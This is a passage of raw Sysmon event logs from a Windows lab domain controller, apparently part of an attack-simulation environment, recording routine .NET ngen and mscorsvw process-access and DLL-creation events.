08:06:33.365","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2289-5F25-0000-001032080F00}","TargetProcessId":"2332","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7782,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:33.678\r\nProcessGuid: {41C8662E-2289-5F25-0000-001032080F00}\r\nProcessId: 2332\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\91c-0\\System.DirectoryServices.Protocols.dll\r\nCreationUtcTime: 2020-08-01 08:06:33.678","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:33.678","ProcessGuid":"{41C8662E-2289-5F25-0000-001032080F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\91c-0\\System.DirectoryServices.Protocols.dll","CreationUtcTime":"2020-08-01 08:06:33.678","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7783,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:33.709\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2277-5F25-0000-0010BDAA0E00}\r\nTargetProcessId: 4588\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:33.709","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2277-5F25-0000-0010BDAA0E00}","TargetProcessId":"4588","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7784,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:33.709\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2277-5F25-0000-0010BDAA0E00}\r\nTargetProcessId: 4588\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:33.709","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2277-5F25-0000-0010BDAA0E00}","TargetProcessId":"4588","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7785,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:33.709\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2277-5F25-0000-0010BDAA0E00}\r\nTargetProcessId: 4588\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:33.709","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2277-5F25-0000-0010BDAA0E00}","TargetProcessId":"4588","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7786,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:33.756\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2278-5F25-0000-001002B00E00}\r\nTargetProcessId: 2452\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:33.756","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-2278-5F25-0000-001002B00E00}","TargetProcessId":"2452","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7787,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:33.756\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2278-5F25-0000-001002B00E00}\r\nTargetProcessId: 2452\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:33.756","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2278-5F25-0000-001002B00E00}","TargetProcessId":"2452","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7788,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:33.756\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-2278-5F25-0000-001002B00E00}\r\nTargetProcessId: 2452\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:06:33.756","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2278-5F25-0000-001002B00E00}","TargetProcessId":"2452","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7789,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:06:33.928\r\nProcessGuid: {41C8662E-2289-5F25-0000-0010470F0F00}\r\nProcessId: 2452\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\994-0\\System.Drawing.Design.dll\r\nCreationUtcTime: 2020-08-01 08:06:33.928","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:06:33.928","ProcessGuid":"{41C8662E-2289-5F25-0000-0010470F0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\994-0\\System.Drawing.Design.dll","CreationUtcTime":"2020-08-01 08:06:33.928","EventReceivedTime":"2020-08-01 08:06:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:06:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7790,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:06:33.959\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-2289-5F25-0000-001015130F00}\r\nTargetProcessId: 2124\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 